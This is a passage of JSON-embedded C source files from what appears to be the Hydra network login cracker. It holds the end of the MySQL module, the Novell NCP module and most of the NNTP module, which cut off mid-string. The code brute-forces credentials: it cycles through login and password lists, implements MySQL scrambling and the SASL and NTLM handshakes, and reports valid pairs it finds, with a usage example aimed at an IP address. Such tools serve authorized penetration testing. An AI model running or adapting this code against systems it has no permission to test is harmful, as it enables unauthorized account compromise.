strlen(server_version) + 10;\n memcpy(mysqlsalt, pos, 9);\n\n if (!strstr(server_version, \"3.\") && !strstr(server_version, \"4.\") && strstr(server_version, \"5.\")) {\n#ifndef LIBMYSQLCLIENT\n hydra_report(stderr, \"[ERROR] Not an MySQL protocol or unsupported version,\\ncheck \"\n \"configure to see if libmysql is found\\n\");\n#endif\n free(buf);\n return 2;\n }\n\n free(buf);\n return 0;\n}\n\n/* prepare response to server greeting */\nchar *hydra_mysql_prepare_auth(char *login, char *pass) {\n unsigned char *response;\n unsigned long login_len = strlen(login) > 32 ? 32 : strlen(login);\n unsigned long response_len = 4 /* header */ + 2 /* client flags */ + 3 /* max packet len */ + login_len + 1 + 8 /* scrambled password len */;\n\n response = (unsigned char *)malloc(response_len + 4);\n if (response == NULL) {\n fprintf(stderr, \"[ERROR] could not allocate memory\\n\");\n return NULL;\n }\n memset(response, 0, response_len + 4);\n\n *((unsigned long *)response) = response_len - 4;\n response[3] = 0x01; /* packet number */\n response[4] = 0x85;\n response[5] = 0x24; /* client flags */\n response[6] = response[7] = response[8] = 0x00; /* max packet */\n memcpy(&response[9], login, login_len); /* login */\n response[9 + login_len] = '\\0'; /* null terminate login */\n hydra_scramble((char *)&response[9 + login_len + 1], mysqlsalt, pass);\n\n return (char *)response;\n}\n\n/* returns 0 if authentication succeed */\n\n/* and 1 if failed */\nchar hydra_mysql_parse_response(unsigned char *response) {\n unsigned long response_len = *((unsigned long *)response) & 0xffffff;\n\n if (response_len < 4)\n return 0;\n\n if (response[4] == 0xff)\n return 1;\n\n return 0;\n}\n\nchar hydra_mysql_send_com_quit(int32_t sock) {\n char com_quit_packet[5] = {0x01, 0x00, 0x00, 0x00, 0x01};\n\n hydra_send(sock, com_quit_packet, 5, 0);\n return 0;\n}\n\nint32_t start_mysql(int32_t sock, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *response = NULL, *login = NULL, *pass = NULL;\n unsigned long response_len;\n char res = 0;\n char *database = NULL;\n\n login = hydra_get_next_login();\n pass = hydra_get_next_password();\n\n if (miscptr)\n database = miscptr;\n\n /* read server greeting */\n res = hydra_mysql_init(sock);\n\n if (res == 2) {\n /* old reversing protocol trick did not work */\n /* try using the libmysql client if available */\n hydra_mysql_send_com_quit(sock);\n sock = hydra_disconnect(sock);\n#ifdef LIBMYSQLCLIENT\n\n if (mysql == NULL) {\n mysql = mysql_init(NULL);\n if (mysql == NULL) {\n hydra_report(stderr, \"[ERROR] Insufficient memory to allocate new mysql object\\n\");\n return 1;\n }\n }\n /*mysql_options(&mysql,MYSQL_OPT_COMPRESS,0); */\n if (!mysql_real_connect(mysql, hydra_address2string(ip), login, pass, database, port, NULL, 0)) {\n int32_t my_errno = mysql_errno(mysql);\n\n if (debug)\n hydra_report(stderr, \"[ERROR] Failed to connect to database: %s\\n\", mysql_error(mysql));\n\n /*\n Error: 1049 SQLSTATE: 42000 (ER_BAD_DB_ERROR)\n Message: Unknown database '%s'\n */\n if (my_errno == 1049) {\n hydra_report(stderr, \"[ERROR] Unknown database: %s\\n\", database);\n }\n\n if (my_errno == 1251) {\n hydra_report(stderr, \"[ERROR] Client does not support authentication \"\n \"protocol requested by server\\n\");\n }\n\n /*\n http://dev.mysql.com/doc/refman/5.0/en/error-messages-server.html\n\n Error: 1044 SQLSTATE: 42000 (ER_DBACCESS_DENIED_ERROR)\n Message: Access denied for user '%s'@'%s' to database '%s'\n\n Error: 1045 SQLSTATE: 28000 (ER_ACCESS_DENIED_ERROR)\n Message: Access denied for user '%s'@'%s' (using password: %s)\n\n */\n\n // if the error is more critical, we just try to reconnect\n // to the db later with the mysql_init\n if ((my_errno != 1044) && (my_errno != 1045)) {\n mysql_close(mysql);\n mysql = NULL;\n }\n return 3;\n }\n\n hydra_report_found_host(port, ip, \"mysql\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n mysql_close(mysql);\n mysql = NULL;\n return 3;\n }\n return 1;\n#else\n hydra_child_exit(2);\n#endif\n }\n\n if (res == 1)\n return 1;\n\n /* prepare client authentication packet */\n response = hydra_mysql_prepare_auth(login, pass);\n if (response == NULL)\n return 3;\n response_len = *((unsigned long *)response) & 0xffffff;\n\n /* send client auth packet */\n /* dunny why, mysql IO code had problem reading my response. */\n /* When I send response_len bytes, it always read response_len-4 bytes */\n /* I fixed it just by sending 4 characters more. It is maybe not good */\n /* coding style, but working :) */\n if (hydra_send(sock, response, response_len + 4, 0) < 0) {\n free(response);\n return 1;\n }\n free(response);\n\n /* read authentication response */\n if ((response = hydra_mysql_receive_line(sock)) == NULL)\n return 1;\n res = hydra_mysql_parse_response((unsigned char *)response);\n\n if (!res) {\n hydra_mysql_send_com_quit(sock);\n sock = hydra_disconnect(sock);\n hydra_report_found_host(port, ip, \"mysql\", fp);\n hydra_completed_pair_found();\n free(response);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n\n free(response);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n /* each try requires new connection */\n return 1;\n}\n\nvoid service_mysql(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_MYSQL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0) {\n hydra_mysql_send_com_quit(sock);\n sock = hydra_disconnect(sock);\n }\n // usleepn(300);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n }\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_mysql(sock, ip, port, options, miscptr, fp);\n if ((next_run == 1 || next_run == 2) && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 3: /* clean exit */\n if (sock >= 0) {\n hydra_mysql_send_com_quit(sock);\n sock = hydra_disconnect(sock);\n }\n hydra_child_exit(0);\n return;\n default:\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\n#ifndef LIBMYSQLCLIENT\n\n#endif\n\n/************************************************************************/\n\n/* code belowe is copied from mysql 3.23.57 source code (www.mysql.com) */\n\n/* and slightly modified (removed not needed parts of code, changed */\n\n/* data types) */\n\n/************************************************************************/\nstruct hydra_rand_struct {\n unsigned long seed1, seed2, max_value;\n double max_value_dbl;\n};\n\nvoid hydra_randominit(struct hydra_rand_struct *rand_st, unsigned long seed1, unsigned long seed2) { /* For mysql 3.21.# */\n rand_st->max_value = 0x3FFFFFFFL;\n rand_st->max_value_dbl = (double)rand_st->max_value;\n rand_st->seed1 = seed1 % rand_st->max_value;\n rand_st->seed2 = seed2 % rand_st->max_value;\n}\n\ndouble hydra_rnd(struct hydra_rand_struct *rand_st) {\n rand_st->seed1 = (rand_st->seed1 * 3 + rand_st->seed2) % rand_st->max_value;\n rand_st->seed2 = (rand_st->seed1 + rand_st->seed2 + 33) % rand_st->max_value;\n return (((double)rand_st->seed1) / rand_st->max_value_dbl);\n}\nvoid hydra_hash_password(unsigned long *result, const char *password) {\n register unsigned long nr = 1345345333L, add = 7, nr2 = 0x12345671L;\n unsigned long tmp;\n\n for (; *password; password++) {\n if (*password == ' ' || *password == '\\t')\n continue; /* skipp space in password */\n tmp = (unsigned long)(unsigned char)*password;\n nr ^= (((nr & 63) + add) * tmp) + (nr << 8);\n nr2 += (nr2 << 8) ^ nr;\n add += tmp;\n }\n result[0] = nr & (((unsigned long)1L << 31) - 1L); /* Don't use sign bit (str2int) */\n ;\n result[1] = nr2 & (((unsigned long)1L << 31) - 1L);\n return;\n}\n\nchar *hydra_scramble(char *to, const char *message, const char *password) {\n struct hydra_rand_struct rand_st;\n unsigned long hash_pass[2], hash_message[2];\n char extra;\n\n if (password && password[0]) {\n char *to_start = to;\n\n hydra_hash_password(hash_pass, password);\n hydra_hash_password(hash_message, message);\n hydra_randominit(&rand_st, hash_pass[0] ^ hash_message[0], hash_pass[1] ^ hash_message[1]);\n while (*message++)\n *to++ = (char)(floor(hydra_rnd(&rand_st) * 31) + 64);\n extra = (char)(floor(hydra_rnd(&rand_st) * 31));\n while (to_start != to)\n *(to_start++) ^= extra;\n }\n *to = 0;\n return to;\n}\n#endif\n\nint32_t service_mysql_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_mysql(const char *service) {\n printf(\"Module mysql is optionally taking the database to attack, default is \"\n \"\\\"mysql\\\"\\n\\n\");\n}\n" }, { "path": "hydra-ncp.c", "content": "/*\n *\tNovell Network Core Protocol Support - by David Maciejak @ GMAIL dot com\n *\tTested on Netware 6.5\n *\n * you need to install libncp and libncp-dev (tested with version 2.2.6-3)\n *\n *\tyou can passed full context as OPT\n *\n * example: ./hydra -L login -P passw 172.16.246.129 ncp .O=cx\n *\n */\n\n#include \"hydra-mod.h\"\n\n#ifndef LIBNCP\nvoid dummy_ncp() { printf(\"\\n\"); }\n#else\n\n#include \n#include \n#include \n#include \n\nextern char *HYDRA_EXIT;\nextern int32_t child_head_no;\n\ntypedef struct __NCP_DATA {\n struct ncp_conn_spec spec;\n struct ncp_conn *conn;\n char *context;\n} _NCP_DATA;\n\n// uncomment line below to see more trace stack\n// #define NCP_DEBUG\n\nint32_t start_ncp(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *login;\n char *pass;\n char context[256];\n uint32_t ncp_lib_error_code;\n char *empty = \"\";\n int32_t object_type = NCP_BINDERY_USER;\n\n _NCP_DATA *session;\n\n session = malloc(sizeof(_NCP_DATA));\n memset(session, 0, sizeof(_NCP_DATA));\n login = empty;\n pass = empty;\n\n if (strlen(login = hydra_get_next_login()) == 0) {\n login = empty;\n } else {\n if (miscptr) {\n if (strlen(miscptr) + strlen(login) > sizeof(context)) {\n free(session);\n return 4;\n }\n memset(context, 0, sizeof(context));\n strncpy(context, login, sizeof(context) - 2);\n context[sizeof(context) - 2] = 0;\n strncpy(context + strlen(login), miscptr, sizeof(context) - strlen(login) - 1);\n context[sizeof(context) - 1] = 0;\n login = context;\n }\n }\n\n // login and password are case insensitive\n // str_upper(login);\n\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n ncp_lib_error_code = ncp_find_conn_spec3(hydra_address2string(ip), login, \"\", 1, getuid(), 0, &session->spec);\n if (ncp_lib_error_code) {\n free(session);\n return 1;\n }\n\n ncp_lib_error_code = NWCCOpenConnByName(NULL, session->spec.server, NWCC_NAME_FORMAT_BIND, NWCC_OPEN_NEW_CONN, NWCC_RESERVED, &session->conn);\n if (ncp_lib_error_code) {\n free(session);\n return 1;\n }\n\n memset(session->spec.password, 0, sizeof(session->spec.password));\n memcpy(session->spec.password, pass, strlen(pass) + 1);\n // str_upper(session->spec.password);\n\n ncp_lib_error_code = ncp_login_conn(session->conn, session->spec.user, object_type, session->spec.password);\n switch (ncp_lib_error_code & 0x0000FFFF) {\n case 0x0000: /* Success */\n#ifdef NCP_DEBUG\n printf(\"Connection success (%s / %s). Error code: %X\\n\", login, pass, ncp_lib_error_code);\n#endif\n ncp_close(session->conn);\n hydra_report_found_host(port, ip, \"ncp\", fp); // ok\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3; // exit\n free(session);\n return 2; // next\n break;\n case 0x89DE: /* PASSWORD INVALID */\n case 0x89F0: /* BIND WILDCARD INVALID */\n case 0x89FF: /* NO OBJ OR BAD PASSWORD */\n case 0xFD63: /* FAILED_AUTHENTICATION */\n case 0xFDA7: /* NO_SUCH_ENTRY */\n#ifdef NCP_DEBUG\n printf(\"Incorrect password (%s / %s). Error code: %X\\n\", login, pass, ncp_lib_error_code);\n#endif\n ncp_close(session->conn);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n free(session);\n return 2; // next\n }\n break;\n default:\n#ifdef NCP_DEBUG\n printf(\"Failed to open connection. Error code: %X\\n\", ncp_lib_error_code);\n#endif\n if (session->conn != NULL)\n ncp_close(session->conn);\n break;\n }\n free(session);\n return 1; // reconnect\n}\n\nvoid service_ncp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_NCP;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n case 2:\n /*\n * Here we start the password cracking process\n */\n next_run = start_ncp(sock, ip, port, options, miscptr, fp);\n break;\n case 3:\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n case 4:\n if (child_head_no == 0)\n fprintf(stderr, \"[ERROR] Optional parameter too long!\\n\");\n hydra_child_exit(0);\n\n default:\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\n#endif\n\nint32_t service_ncp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_ncp(const char *service) {\n printf(\"Module ncp is optionally taking the full context, for example \"\n \"\\\".O=cx\\\"\\n\\n\");\n}\n" }, { "path": "hydra-nntp.c", "content": "#include \"hydra-mod.h\"\n#include \"sasl.h\"\n\n/*\n\nBased on:\n\nRFC 3977: Network News Transfer Protocol (NNTP)\nRFC 4643: Network News Transfer Protocol (NNTP) Extension for Authentication\n\n*/\n\nint32_t nntp_auth_mechanism = AUTH_CLEAR;\n\nextern char *HYDRA_EXIT;\nchar *buf;\n\nchar *nntp_read_server_capacity(int32_t sock) {\n char *ptr = NULL;\n int32_t resp = 0;\n char *buf = NULL;\n\n do {\n if (buf != NULL)\n free(buf);\n ptr = buf = hydra_receive_line(sock);\n if (buf != NULL) {\n if (isdigit((int32_t)buf[0]) && buf[3] == ' ')\n resp = 1;\n else {\n if (buf[strlen(buf) - 1] == '\\n')\n buf[strlen(buf) - 1] = 0;\n if (buf[strlen(buf) - 1] == '\\r')\n buf[strlen(buf) - 1] = 0;\n#ifdef NO_STRRCHR\n if ((ptr = rindex(buf, '\\n')) != NULL) {\n#else\n if ((ptr = strrchr(buf, '\\n')) != NULL) {\n#endif\n ptr++;\n if (isdigit((int32_t)*ptr) && *(ptr + 3) == ' ')\n resp = 1;\n }\n }\n }\n } while (buf != NULL && resp == 0);\n return buf;\n}\n\nint32_t start_nntp(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\\\"\\\"\", *result = NULL;\n char *login, *pass, buffer[500], buffer2[500], *fooptr;\n int32_t i = 1;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n while (i > 0 && hydra_data_ready(s) > 0)\n i = hydra_recv(s, buffer, 300);\n\n if (i < 0)\n i = 0;\n buffer[i] = 0;\n\n switch (nntp_auth_mechanism) {\n case AUTH_LOGIN:\n sprintf(buffer, \"AUTHINFO SASL LOGIN\\r\\n\");\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (buf == NULL || strstr(buf, \"383\") == NULL) {\n hydra_report(stderr, \"[ERROR] NNTP LOGIN AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n strcpy(buffer2, login);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n\n sprintf(buffer, \"%.250s\\r\\n\", buffer2);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (buf == NULL || strstr(buf, \"383\") == NULL) {\n hydra_report(stderr, \"[ERROR] NNTP LOGIN AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n strcpy(buffer2, pass);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%.250s\\r\\n\", buffer2);\n break;\n case AUTH_PLAIN:\n sprintf(buffer, \"AUTHINFO SASL PLAIN\\r\\n\");\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (buf == NULL || strstr(buf, \"383\") == NULL) {\n hydra_report(stderr, \"[ERROR] NNTP PLAIN AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n free(buf);\n\n memset(buffer, 0, sizeof(buffer));\n result = sasl_plain(buffer, login, pass);\n if (result == NULL)\n return 3;\n\n char tmp_buffer[sizeof(buffer)];\n sprintf(tmp_buffer, \"%.250s\\r\\n\", buffer);\n strcpy(buffer, tmp_buffer);\n\n break;\n#ifdef LIBOPENSSL\n case AUTH_CRAMMD5: {\n int32_t rc = 0;\n char *preplogin;\n\n rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);\n if (rc) {\n return 3;\n }\n\n sprintf(buffer, \"AUTHINFO SASL CRAM-MD5\\r\\n\");\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n // get the one-time BASE64 encoded challenge\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (buf == NULL || strstr(buf, \"383\") == NULL) {\n hydra_report(stderr, \"[ERROR] NNTP CRAM-MD5 AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n\n memset(buffer, 0, sizeof(buffer));\n from64tobits((char *)buffer, buf + 4);\n free(buf);\n\n memset(buffer2, 0, sizeof(buffer2));\n result = sasl_cram_md5(buffer2, pass, buffer);\n if (result == NULL)\n return 3;\n\n sprintf(buffer, \"%s %.250s\", preplogin, buffer2);\n hydra_tobase64((unsigned char *)buffer, strlen(buffer), sizeof(buffer));\n\n char tmp_buffer[sizeof(buffer)];\n sprintf(tmp_buffer, \"%.250s\\r\\n\", buffer);\n strcpy(buffer, tmp_buffer);\n free(preplogin);\n } break;\n\n case AUTH_DIGESTMD5: {\n sprintf(buffer, \"AUTHINFO SASL DIGEST-MD5\\r\\n\");\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n // receive\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (buf == NULL || strstr(buf, \"383\") == NULL || strlen(buf) < 8) {\n hydra_report(stderr, \"[ERROR] NNTP DIGEST-MD5 AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n memset(buffer, 0, sizeof(buffer));\n from64tobits((char *)buffer, buf + 4);\n free(buf);\n\n if (debug)\n hydra_report(stderr, \"DEBUG S: %s\\n\", buffer);\n fooptr = buffer2;\n result = sasl_digest_md5(fooptr, login, pass, buffer, miscptr, \"nntp\", NULL, 0, NULL);\n if (result == NULL)\n return 3;\n\n if (debug)\n hydra_report(stderr, \"DEBUG C: %s\\n\", buffer2);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%s\\r\\n\", buffer2);\n } break;\n\n#endif\n\n case AUTH_NTLM: {\n unsigned char buf1[4096];\n unsigned char buf2[4096];\n\n // send auth and receive challenge\n buildAuthRequest((tSmbNtlmAuthRequest *)buf2, 0, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *)buf2));\n sprintf(buffer, \"AUTHINFO SASL NTLM %s\\r\\n\", (char *)buf1);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (buf == NULL || strstr(buf, \"383\") == NULL || strlen(buf) < 8) {\n hydra_report(stderr, \"[ERROR] NNTP NTLM AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n // recover challenge\n from64tobits((char *)buf1, buf + 4);\n free(buf);\n\n buildAuthResponse((tSmbNtlmAuthChallenge *)buf1, (tSmbNtlmAuthResponse *)buf2, 0, login, pass, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *)buf2));\n sprintf(buffer, \"%s\\r\\n\", (char *)buf1);\n } break;\n\n default: {\n sprintf(buffer, \"AUTHINFO USER %.250s\\r\\n\", login);\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n buf = hydra_receive_line(s);\n if (buf == NULL)\n return 1;\n if (buf[0] != '3') {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Not an NNTP protocol or service shutdown: %s\\n\", buf);\n free(buf);\n return (3);\n }\n free(buf);\n sprintf(buffer, \"AUTHINFO PASS %.250s\\r\\n\", pass);\n } break;\n }\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n buf = hydra_receive_line(s);\n if (buf == NULL)\n return 1;\n\n if (buf[0] == '2') {\n hydra_report_found_host(port, ip, \"nntp\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 2;\n}\n\nvoid service_nntp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t i = 0, run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_NNTP, mysslport = PORT_NNTP_SSL, disable_tls = 0;\n char *buffer1 = \"CAPABILITIES\\r\\n\";\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(300);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n // usleepn(300);\n buf = hydra_receive_line(sock);\n if (buf == NULL || buf[0] != '2') { /* check the first line */\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Not an NNTP protocol or service shutdown: %s\\n\", buf);\n hydra_child_exit(2);\n }\n free(buf);\n\n /* send capability request */\n if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)\n hydra_child_exit(2);\n buf = nntp_read_server_capacity(sock);\n\n if (buf == NULL) {\n hydra_child_exit(2);\n }\n#ifdef LIBOPENSSL\n if (!disable_tls) {\n /* if we got a positive answer */\n if (strstr(buf, \"STARTTLS\") != NULL) {\n hydra_send(sock, \"STARTTLS\\r\\n\", strlen(\"STARTTLS\\r\\n\"), 0);\n free(buf);\n buf = hydra_receive_line(sock);\n\n /* 382 Begin TLS negotiation now */\n if (buf == NULL || strstr(buf, \"382\") == NULL) {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] TLS negotiation failed\\n\");\n } else {\n free(buf);\n if ((hydra_connect_to_ssl(sock, hostname) == -1)) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Can't use TLS\\n\");\n disable_tls = 1;\n run = 1;\n break;\n } else {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] TLS connection done\\n\");\n }\n /* ask again capability request but in TLS mode */\n if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)\n hydra_child_exit(2);\n /* we asking again cause often plain and login can only\n be negociate in SSL tunnel\n */\n buf = nntp_read_server_capacity(sock);\n if (buf == NULL) {\n hydra_child_exit(2);\n }\n }\n }\n }\n#endif\n\n /*\n AUTHINFO USER SASL\n SASL PLAIN DIGEST-MD5 LOGIN NTLM CRAM-MD5\n */\n\n#ifdef HAVE_PCRE\n if (hydra_string_match(buf, \"SASL\\\\s.*NTLM\")) {\n#else\n if (strstr(buf, \"NTLM\") != NULL) {\n#endif\n nntp_auth_mechanism = AUTH_NTLM;\n }\n#ifdef LIBOPENSSL\n\n#ifdef HAVE_PCRE\n if (hydra_string_match(buf, \"SASL\\\\s.*DIGEST-MD5\")) {\n#else\n if (strstr(buf, \"DIGEST-MD5\") != NULL) {\n#endif\n nntp_auth_mechanism = AUTH_DIGESTMD5;\n }\n#ifdef HAVE_PCRE\n if (hydra_string_match(buf, \"SASL\\\\s.*CRAM-MD5\")) {\n#else\n if (strstr(buf, \"CRAM-MD5\") != NULL) {\n#endif\n nntp_auth_mechanism = AUTH_CRAMMD5;\n }\n#endif\n#ifdef HAVE_PCRE\n if (hydra_string_match(buf, \"SASL\\\\s.*PLAIN\")) {\n#else\n if (strstr(buf, \"PLAIN\") != NULL) {\n#endif\n nntp_auth_mechanism = AUTH_PLAIN;\n }\n#ifdef HAVE_PCRE\n if (hydra_string_match(buf, \"SASL\\\\s.*LOGIN\")) {\n#else\n if (strstr(buf, \"LOGIN\") != NULL) {\n#endif\n nntp_auth_mechanism = AUTH_LOGIN;\n }\n#ifdef HAVE_PCRE\n if (hydra_string_match(buf, \"AUTHINFO\\\\sUSER\")) {\n#else\n if (strstr(buf, \"AUTHINFO USER\") != NULL) {\n#endif\n nntp_auth_mechanism = AUTH_CLEAR;\n }\n\n if ((miscptr != NULL) && (strlen(miscptr) > 0)) {\n for (i = 0; i < strlen(miscptr); i++)\n miscptr[i] = (char)toupper((int32_t)miscptr[i]);\n\n if (strncmp(miscptr, \"USER\", 4) == 0)\n nntp_auth_mechanism = AUTH_CLEAR;\n\n if (strncmp(miscptr, \"LOGIN\", 5) == 0)\n nntp_auth_mechanism = AUTH_LOGIN;\n\n if (strncmp(miscptr, \"PLAIN\", 5) == 0)\n nntp_auth_mechanism = AUTH_PLAIN;\n\n#ifdef LIBOPENSSL\n if (strncmp(miscptr, \"CRAM-MD5\", 8) == 0)\n nntp_auth_mechanism = AUTH_CRAMMD5;\n\n if (strncmp(miscptr, \"DIGEST-MD5\", 10) == 0)\n nntp_auth_mechanism = AUTH_DIGESTMD5;\n#endif\n\n if (strncmp(miscptr, \"NTLM\", 4) == 0)\n nntp_auth_mechanism = AUTH_NTLM;\n }\n if (verbose) {\n switch (nntp_auth_mechanism) {\n case AUTH_CLEAR:\n hydra_report(stderr, \"[VERBOSE] using NNTP AUTHINFO USER mechanism\\n\");\n break;\n case AUTH_LOGIN:\n hydra_report(stderr, \"[VERBOSE] using NNTP LOGIN AUTH mechanism\\n\");\n break;\n case AUTH_PLAIN:\n hydra_report(stderr, \"[VERBOSE] using NNTP PLAIN AUTH mechanism\\n\");\n break;\n#ifdef LIBOPENSSL\n case AUTH_CRAMMD5:\n hydra_report(stderr, \"[VERBOSE] using NNTP CRAM-MD5 AUTH mechanism\\n\");\n break;\n case AUTH_DIGESTMD5:\n hydra_report(stderr, \"[VERBOSE] using NNTP DIGEST-MD5 AUTH mechanism\\n\");\n break;\n#endif\n case AUTH_NTLM:\n hydra_report(stderr, \"[VERBOSE] using NNTP NTLM AUTH mechanism\\n\");\n break;\n }\n }\n usleepn(25);\n free(buf);\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_nntp(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_nntp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_nntp(const char *service) {\n printf(\"Module nntp is optionally taking one authentication type of:\\n\"\n \" USER (default), LOGIN, PLAIN, CRAM-MD5, 